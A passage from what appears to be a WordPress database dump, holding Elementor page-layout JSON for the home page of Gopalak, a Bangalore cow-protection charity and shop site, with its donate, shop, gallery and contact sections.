#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11494,1911,'_elementor_page_assets','a:0:{}'),(11496,1912,'_elementor_edit_mode','builder'),(11497,1912,'_elementor_template_type','wp-page'),(11498,1912,'_elementor_version','3.7.8'),(11499,1912,'_wp_page_template','elementor_canvas'),(11500,1912,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 